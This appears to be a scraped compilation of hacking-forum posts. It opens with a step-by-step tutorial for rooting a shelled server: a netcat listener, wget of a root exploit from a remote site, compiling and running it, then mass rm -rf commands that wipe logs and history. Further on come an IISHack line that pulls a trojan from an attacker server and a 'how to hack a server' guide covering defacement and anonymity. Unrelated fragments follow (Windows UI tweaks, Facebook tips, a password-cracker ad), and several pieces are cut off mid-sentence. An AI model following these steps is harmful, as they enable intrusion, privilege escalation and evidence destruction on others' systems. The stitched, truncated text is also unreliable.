Hi guys today i will tell you how to root a server in few easy steps .
Things Required :
NetcaT
Shelled site
Local root expl0it
Step By Step Tutorial :
First go to Run & type cmd then type : cd C:\Program Files\Netcat ( Make sure that you Netcat is saved in the following directory ) .
Now Type : nc -n -l -v -p 443 , then it would show like the image shown below .
Its time to open your shell & then connect using back connect function in your shell ( Make sure that you are not using any Vpn or Proxy ) . Then after the connection is established you will see something as shown in the screenshot below .
So you have successfully connected .. Then now we have to get our Local Root Exploit, like mine is 2.6.18-374 2011 .
In this step we have to upload our exploit in a writable folder, so instead of wasting our time in finding them ..we can just change the directory to the /tmp folder which is a standard writable folder .
Type this command to change dir to /tmp : cd /tmp
To upload your your exploit we will use wget function .
Type : wget http://www.somesite.com/exploit.c
Now this will upload the exploit in the tmp folder .
(Case 1) if you have uploaded your exploit as .c (exploit.c) the we have to compile it, so to compile it we will type the following command .
Type : gcc exploit.c -o exploit
Keep in mind in the above command exploit refers to the name of your exploit (exploit.c) .so if its properly compiled with no errors & warning then you can proceed or if you get an error then find another exploit.
(Case 2) If you have uploaded your exploit in a zip file then you have to unzip it by typing the below command .
Type: unzip exploit.zip
After we have done all the above steps correctly, its time to give permission so we will type the following command
Type: chmod 777 exploit
Now its time to run the Exploit, to run the exploit we will type the following command
Type: ./exploit
Now the exploit will run & the server will be rooted ;) . To check weather we got root we can type
Type: id or whoami
Clearing Logs:
Now its our time to clearing our tracks or Logs . so below are some commands to delete the log files .
rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;
Hacking Tool: IISHack.exe
iishack.exe overflows a buffer used by IIS http daemon,
allowing for arbitrary code to be executed.
c:\ iishack www.yourtarget.com 80 www.yourserver.com/thetrojan.exe
www.yourtarget.com is the IIS server you're hacking, 80 is the port its listening on,
www.yourserver.com is some webserver with your trojan or custom script (your own, or another), and /thetrojan.exe is the path to that script.
"IIS Hack" is a buffer overflow vulnerability exposed by the way IIS handles requests with .HTR extensions.
A hacker sends a long URL that ends with ".HTR". IIS interprets it as a file type of HTR and invokes the ISM.DLL to handle the request.
Since ISM.DLL is vulnerable to a buffer overflow, a carefully crafted string can be executed in the security context of IIS,
which is privileged. For example, it is relatively simple to include in the exploit code a sequence of commands that will open a TCP/IP connection,
download an executable and then execute it.
This way,
any malicious code can be executed.
A sample exploit can be constructed as shown below:
To hack the target site and attacker's system running a web server can use iishack.exe and ncx.exe.
To begin with, the ncx.exe is configured to run from the root directory.
IIShack.exe is then run against the victim site.
c:\>iishack.exe 80 /ncx.exe
The attacker can then use netcat to evoke the command shell
c:\>nc 80
He can proceed to upload and execute any code of his choice and maintain a backdoor on the target site.
IPP Buffer Overflow Countermeasures
Install latest service pack from Microsoft.
Remove IPP printing from IIS Server
Install firewall and remove unused extensions
Implement aggressive network egress filtering
Use IISLockdown and URLScan utilities
Regularly scan your network for vulnerable servers
Without any further explanation,
the first countermeasure is obviously to install the latest service packs and hotfixes.
As with many IIS vulnerabilities, the IPP exploit takes advantage of a bug in an ISAPI DLL that ships with IIS 5 and is configured by default to handle requests for certain file types.
This particular ISAPI filter resides in C: \WINNT\System32\msw3prt.dll and provides Windows 2000 with support for the IPP. If this functionality is not required on the Web server,
the application mapping for this DLL to .printer files can be removed (and optionally deleting the DLL itself) in order to prevent the buffer overflow from being exploited.
This is possible because the DLL will not be loaded into the IIS process when it starts up.
In fact, most security issues are centered on the ISAPI DLL mappings,
making this one of the most important countermeasure to be adopted when securing IIS.
Another standard countermeasure that can be adopted here is to use a firewall and remove any extensions that are not required.
Implementing aggressive network egress can help to a certain degree.
With IIS, using IISLockdown and URLScan - (free utilities from Microsoft) can ensure more protection and minimize damage in case the web server is affected.
Microsoft has also released a patch for the buffer overflow,
but removing the ISAPI DLL is a more proactive solution in case there are additional vulnerabilities that are yet to be found with the code.
ISAPI DLL Source disclosures
Microsoft IIS 4.0 and 5.0 can be made to disclose fragments of source code which should otherwise be in accessible.
This is done by appending "+.htr" to a request for a known .asp (or .asa, .ini, etc) file.
appending this string causes the request to be handled by ISM.DLL, which then strips the '+.htr' string and may disclose part or all of the source of the .asp file specified in the request.
IIS supports several file types that require server-side processing. When a web site visitor requests a file of one of these types, an appropriate filter DLL processes it. Vulnerability exists in ISM.DLL,
the filter DLL that processes .HTR files. HTR files enable remote administration of user passwords.
HTR files are scripts that allow Windows NT password services to be provided via IIS we
When I had the idea to expand our Blog’s topics (not only Apple, iPhone, iPad, little tips on Mac and Windows etc….) and add more hacking information, tutorials etc….
So, today I decided to make a good start by creating this post-tutorial: How to Hack a Server
Everything you need to know….
Tools you need:
- Backtrack (Backtrack Website)
- Firefox (get it from here….) – Included in Backtrack and Ubuntu
- Netcat (Included in Backtrack) — If you are on other linux enviroments get it from here….
- iCon2PHP (Get it from here….)
- A good shell (iCon2PHP Archive includes three great shells)
- A good VPN or Tor (More explanation below…..)
- Acunentix Web Vulnerability Scanner (Search for a cracked version at Hackforums.net)
About the Tools:
Backtrack
– Backtrack is a Linux distribution based on Ubuntu. It includes everything you need to become a good hacker. Apart from this, hacking behind a Linux system is better than a Windows one since most Websites are on Linux Servers.
(Just a little tip: To wirelessly connect to a network use the Wicd Network Manager, located under the Applications->Internet)
Firefox
– Firefox is the best browser for hacking. You can easily configure a proxy and you can download millions of add-ons among which you can find some for Hacking. Find more about “Hacky” addons for Firefox Here….
Netcat
– Netcat is a powerful networking tool. You will need this to root the server….
iCon2PHP & Good Shells
– iCon2PHP is a tool I created and you will use it if you upload the image to an Image Uploader at a Forum or Image Hosting Service. iCon2PHP Archive contains some of the top shells available.
Good VPN or TOR (Proxies are good too…)
– While hacking you need to be anonymous so as not to find you (even if you forget to delete the logs….). A VPN stands for Virtual Private Network and what it does is: hiding your IP, encrypting the data you send and receive to and from the Internet. A good VPN solution for Windows Maschines is ProXPN. However, with VPN connections (especially when you are under a free VPN connection) your connection speen is really slow. So, I wouldn’t recommend VPN except if you pay and get a paid account.
What I would recommend is Tor. Tor can be used from its bundle: Vidalia, which is a great tool for Windows, Mac and Linux that uses Proxies all over its network around the world so as to keep you anonymous and changing these Proxies every 5-10 minutes. I believe it is among the best solutions to keep you anonymous if you don’t want to pay for a Paid VPN account
Apart from Tor, simple Proxies are good but I wouldn’t recommend them as much as I would for Tor.
— If I listed the above options according to their reliability :
1. Paid VPN Account at ProXPN
2. Tor
3. Free VPN Account at ProXPN
4. Proxy Connection
Acunetix Web Vulnerability Scanner
– Acunetix is (maybe the best) Vulnerability Scanner. It scans for open ports, vulnerabilities, directory listing. During the scan it lists the vulnerabilities and says how a hacker can exploit it and how to patch it. It also shows if it is a small or big vulnerability.
The Consultant Edition (For unlimited websites) costs about 3000-7000$.
____________________________________________________________
Starting the Main Tutorial:
So, here is the route we will follow:
Find a Vulnerable Website –> Upload a c100 Shell (Hidden in an Image with iCon2PHP) –> Rooting the Server –> Defacing the Website –> Covering your Tracks
- – - Before we begin – - -
-Boot to Backtrack
-Connect to your VPN or to Tor.
-It would be good to read a complete guide to stay anonymous while hacking here…
-Open Firefox.
1. Finding a Vulnerable Website and Information about it:
Crack Acunetix (find tutorial at Hackforums.net). Open and scan the website (use the standard profile – don’t modify anything except if you know what you are doing). For this tutorial our website will be: http://www.site.com (not very innovative, I know….)
Let’s say we find a vulnerability where we can upload a remote file (our shell) and have access to the website’s files.
Th
=> Changing the look of RUN Dialog Box
For it, u hv to edit %windir%\System32\shell32.dll file, and goto: Dialog -> 1003 -> 1033
==> Changing the Progress Dialog Box (The box which appears while Copying/pasting/deleting stuffs)
Open %windir%\System32\shell32.dll file, and goto: Dialog -> 1020 -> 1033
==> Changing the look of Open With box
Open %windir%\System32\shell32.dll file, and goto: Dialog -> 1063 -> 1033 & Dialog -> 1070 -> 1033
==> Changing the look of Classic Logoff dialog box
Open %windir%\System32\shell32.dll file, and goto: Dialog -> 1071 -> 1033
==> Changing the look of Drive Properties box
Open %windir%\System32\shell32.dll file, and goto: Dialog -> 1080 -> 1033 & Dialog -> 1081 -> 1033
==> Changing the look of New Logoff dialog box
Open %windir%\System32\shell32.dll file, and goto: Dialog -> 1089 -> 1033
==> Changing the look of the box, which appears when Windows ask to select application/search with web service to open the UNKNOWN filetype
Open %windir%\System32\shell32.dll file, and goto: Dialog -> 1091 -> 1033
==> Changing the look of Autoplay box
Open %windir%\System32\shell32.dll file, and goto: Dialog -> 1119 -> 1033
==> Changing the look of Folder Customize box
Open %windir%\System32\shell32.dll file, and goto: Dialog -> 1124 -> 1033
==> Changing the look of Windows Default CD Writing Wizard
Open %windir%\System32\shell32.dll file, and goto: Dialog -> 1125 to 1138 -> 1033
==> Changing the look of Classic Shutdown dialog box
Open %windir%\System32\shell32.dll file, and goto: Dialog -> 8226 -> 1033
==> Changing the look of About Windows dialog box
Open %windir%\System32\shell32.dll file, and goto: Dialog -> 14352 -> 1033
==> Changing the look of Format Drive dialog box
Open %windir%\System32\shell32.dll file, and goto: Dialog -> 28672 -> 1033
==> Changing the look of Scandisk dialog box
Open %windir%\System32\shell32.dll file, and goto: Dialog -> 28800 -> 1033
==> Changing the look of Desktop tab in Desktop Properties box
Open %windir%\System32\shell32.dll file, and goto: Dialog -> 29952 to 29956 -> 1033
==> Changing the look of Folder Options box
Open %windir%\System32\shell32.dll file, and goto: Dialog -> 29959 & 29960 -> 1033
==> Changing the look of DOS Properties box
Open %windir%\System32\shell32.dll file, and goto: Dialog -> 32768 - 32885 -> 1033
==> Changing the look of Taskbar & Start Menu Properties box
Open %windir%\Explorer.exe file, and goto: Dialog -> 6 to 1135 -> 1033
==> Changing the look of Windows Security box, which appears when we press ctrl+alt+del keys while Welcome Screen is Disabled
Open %windir%\System32\Msgina.dll file, and goto: Dialog -> 1800 -> 1033
==> Changing the look of Shutdonw Reason UI box
Open %windir%\System32\Msgina.dll file, and goto: Dialog -> 2200 -> 1033
==> Changing the look of New Shutdown dialog box
Open %windir%\System32\Msgina.dll file, and goto: Dialog -> 20100 -> 1033
==> Changing the look of Shutdown Timer box
Open %windir%\System32\WinLogon.exe file, and goto: Dialog -> 1300 -> 1033
==> Changing the look of System Properties box
Open %windir%\System32\Sysdm.cpl file, and goto: Dialog -> 41 to 4103 -> 1033
==> Changing the look of Choose Color box
Open %windir%\System32\Comdlg32.dll file, and goto: Dialog -> CHOOSECOLOR -> 1033
==> Changing the look of Choose Font box
Open %windir%\System32\Comdlg32.dll file, and goto: Dialog -> 401 & 1543 -> 1033
==> Changing the look of Printer Properties box
Open %windir%\System32\Comdlg32.dll file, and goto: Dialog -> 1538 & 1539 & 1546 -> 1033
==> Changing the look of Open/Save Dialog box
Open %windir%\System32\Comdlg32.dll file, and goto: Dialog -> 1547 * 1552 -> 1033
==> Changing the look of Many tabs in Desktop Properties box
Open %windir%\System32\ThemeUI.dll file, and goto: Dialog -> 1000 to 1017 -> 1033
==> Changing the look of Classic Programs Menu
Open %windir%\Explorer.exe file, and goto: Menu -> 204 -> 1033
==> Changing the look of Taskbar Context Menu
Open %windir%\Explorer.exe file, and goto: Menu -> 205 -> 1033
==> Changing the Start button Text
Open %windir%\Explorer.exe file, and goto: String Tabl
Two teenagers were arrested here on
Long Island for hacking into a female
acquaintance's MySpace account. Using
an old social engineering ruse, they sent
the victim an email stating that another
"user" had a similar MySpace page to
hers and that the victim's pictures and
info were on it. In their email they
conveniently sent her a "link" (bogus, of
course) that she could clicked on to take
her to the fake MySpace login page. At
that point once she entered her login
information the two teens were able to
capture her password data and with it
they logged into her account and posted
inappropriate material on her real page.
Social engineering attacks are hard to
combat and all the security in the world
will not help when you open the door and
invite the hacker in!
Most of the people on Facebook are
blocked these days for adding new
friend. We already told you the reasons
behind this ban and its after effects
( Click here if you missed it). Here are
few tips to tell you how you can avoid
such bans and why you should avoid
them.
Avoid getting blocked from adding
people:
Don’t send a friend request to
every profile you visit. Facebook
Algo might ban you if you add
people with no mutual friends.
You can add strangers but avoid
sending so many requests
together. Give at least one day
gap and wait for the other person
to accept the pending request first
before you send a new one.
If someone’s not accepting your
request and kept it pending, it is
highly recommended to cancel
your friend request.
In case you are adding a
stranger, try sending a message
first, talk and make sure that he/
she will accept you request. Only
then you should send it.
Please note that sending
messages to strangers is now
considered as a spam as well.
Even if you are sending too many
messages to users who are not in
your friends list, Facebook might
ban you for adding friends.
Don’t try to add people when you
are banned. Facebook may
increase your period of ban.
Once banned, there is no need to
cancel pending friend requests,
this hardly makes a difference.
But there’s a possibility that
someone you added might report
you as unknown to Facebook.
Accept incoming friend requests
from the ‘Friend Requests’ page
i.e. https://www.facebook.com/
reqs.php not from the sender’s
profile directly.
You should always avoid such type of
bans as Facebook won’t allow you to
add persons after the ban even if you
know them. This will also ban you from
sending messages to people who are
not in your friends list. Personally even
I don’t like this feature of Facebook
where we cannot make online friend
whom we don’t know personally. But
since we’re addicted to Facebook, so
we have to accept it in the way it is. I
recommend you not to add any
stranger directly; you can always poke
someone with a mutual friend. If you
get a poke in return then there’s a
possibility of request getting accepted.
==> Changing the look of RUN Dialog
Box
For it, u hv to edit %windir%
\System32\shell32.dll file, and goto:
Dialog -> 1003 -> 1033
==> Changing the Progress Dialog Box
(The box which appears while Copying/
pasting/deleting stuffs)
Open %windir%\System32\shell32.dll
file, and goto: Dialog -> 1020 -> 1033
==> Changing the look of Open With box
Open %windir%\System32\shell32.dll
file, and goto: Dialog -> 1063 -> 1033 &
Dialog -> 1070 -> 1033
==> Changing the look of Classic Logoff
dialog box
Open %windir%\System32\shell32.dll
file, and goto: Dialog -> 1071 -> 1033
==> Changing the look of Drive
Properties box
Open %windir%\System32\shell32.dll
file, and goto: Dialog -> 1080 -> 1033 &
Dialog -> 1081 -> 1033
==> Changing the look of New Logoff
dialog box
Open %windir%\System32\shell32.dll
file, and goto: Dialog -> 1089 -> 1033
==> Changing the look of the box, which
appears when Windows ask to select
application/search with web service to
open the UNKNOWN filetype
Open %windir%\System32\shell32.dll
file, and goto: Dialog -> 1091 -> 1033
==> Changing the look of Autoplay box
Open %windir%\System32\shell32.dll
file, and goto: Dialog -> 1119 -> 1033
==> Changing the look of Folder
Customize box
Open %windir%\System32\shell32.dll
file, and goto: Dialog -> 1124 -> 1033
==> Changing the look of Windows
Default CD Writing Wizard
Open %windir%\System32\shell32.dll
file, and goto: Dialog -> 1125 to 1138 ->
1033
==> Changing the look of Classic
Shutdown dialog box
Open %windir%\System32\shell32.dll
file, and goto: Dialog -> 8226 -> 1033
==> Changing the look of About
Windows dialog box
Open %windir%\System32\shell32.dll
file, and goto: Dialog -> 14352 -> 1033
==> Changing the look of Format Drive
dialog box
Open %windir%\System32\shell32.dll
file, and goto: Dialog -> 28672 -> 1033
==> Changing the look of Scandisk
dialog box
Open %windir%\System32\shell32.dll
file, and goto: Dialog -> 28800 -> 1033
==> Changing the look of Desktop tab in
Desktop Properties box
Open %windir%\System32\shell32.dll
file, and goto: Dialog -> 29952 to 29956
-> 1033
==> Changing the look of Folder Options
box
Open %windir%\System32\shell32.dll
file, and goto: Dialog -> 29959 & 29960
-> 1033
==> Changing the look of DOS
Properties box
Open %windir%\System32\shell32.dll
file, and goto: Dialog -> 32768 - 32885 -
> 1033
==> Changing the look of Taskbar &
Start Menu Properties box
Open %windir%\Explorer.exe file, and
goto: Dialog -> 6 to 1135 -> 1033
==> Changing the look of Windows
Security box, which appears when we
press ctrl+alt+del keys while Welcome
Screen is Disabled
Open %windir%\System32\Msgina.dll
file, and goto: Dialog -> 1800 -> 1033
==> Changing the look of Shutdonw
Reason UI box
Open %windir%\System32\Msgina.dll
file, and goto: Dialog -> 2200 -> 1033
==> Changing the look of New Shutdown
dialog box
Open %windir%\System32\Msgina.d ll
file, and goto: Dialog -> 20100 -> 1033
==> Changing the look of Shutdown
Timer box
Open %windir%
\System32\WinLogon.exe file, and goto:
Dialog -> 1300 -> 1033
==> Changing the look of System
Properties box
Open %windir%\System32\Sysdm.cpl
file, and goto: Dialog -> 41 to 4103 ->
1033
==> Changing the look of Choose Color
box
Open %windir%
\System32\Comdlg32.dll file, and goto:
Dialog -> CHOOSECOLOR -> 1033
==> Changing the look of Choose Font
box
Open %windir%
\System32\Comdlg32.dll file, and goto:
Dialog -> 401 & 1543 -> 1033
==> Changing the look of Printer
Properties box
Open %windir%
\System32\Comdlg32.dll file, and goto:
Dialog -> 1538 & 1539 & 1546 -> 1033
==> Changing the look of Open/Save
Dialog box
Open %windir%
\System32\Comdlg32.dll file, and goto:
Dialog -> 1547 * 1552 -> 1033
==> Changing the look of Many tabs in
Desktop Properties box
Open %windir%\System32\ThemeUI.dll
file, and goto: Dialog -> 1000 to 1017 ->
1033
==> Changing the look of Classic
Programs Menu
Open %windir%\Explorer.exe file, and
goto: Menu -> 204 -> 1033
==> Changing the look of Taskbar
Context Menu
Open %windir%\Explorer.exe file, and
goto: Menu -> 205 -> 1033
==> Changing the Start button Text
Open %windir%\Explorer.exe file, and
goto: String Table -> 37 -> 1033 -> 578
(For New Theme) & String Table -> 38 -
> 1033 -> 595 (For Classic Theme).
==> Changing the Start Button Tool-Tip
Text
Open %windir%\Explorer.exe file, and
goto: String Table -> 51 -> 1033 -> 800
==> Changing the Log off, Shutdown,
Search, Help & Support, Run, etc. Text
entries in New Start Menu
Open %windir%\Explorer.exe file, and
goto: String Table -> 439 -> 1033
==> Changing the Internet & E-Mail text
in New Start Menu
Open %windir%\Explorer.exe file, and
goto: String Table -> 440 -> 1033
==> Changing the All Programs text in
New Start Menu
Open %windir%\Explorer.exe file, and
goto: String Table -> 515 -> 1033 ->
8226.
==> Changing the Connect to, Control
Panel, Favorites, My Recent Documents
text entries in New Start Menu
Open %windir%\Explorer.exe file, and
goto: String Table -> 515 -> 1033
==> Changing the Start Button Icon
Open %windir%\Explorer.exe file, and
goto: Bitmap -> 143 -> 1033
==> Changing the Side Image in Classic
Start Menu
Open %windir%\Explorer.exe file, and
goto: Bitmap -> 167 -> 1033
First of all, get a Yahoo mail password
cracker: Wondershare WinSuite 2012, is a
trustworthy program that can help to
crack Yahoo mail password in 3 steps
with no hassle.
90 Days Money Back Guarantee
Now, follow the steps below to do what
you need.
Step1. Run Yahoo password cracker
After running the Yahoo password hacker,
go to the "Password & Key Finder" on the
top menu. Then click the "Password
Finder" button in the window to continue.
Step2. Select Yahoo mail/messenger
password
Select "Yahoo! Mail/Yahoo! Messenger
Password" and click "Next" to crack your
Yahoo mail password now.
Step3. Hack Yahoo mail password
Now you can hack Yahoo password
according to the guide in the window
below.
Note: It's illegal to recover others' Yahoo
passwords without permission. This tool
is designed to recover only the user's
accounts when necessary. What's more,
this program also allows you to recover
passwords for your MSN, Hotmail, Gmail,
Outlook, etc.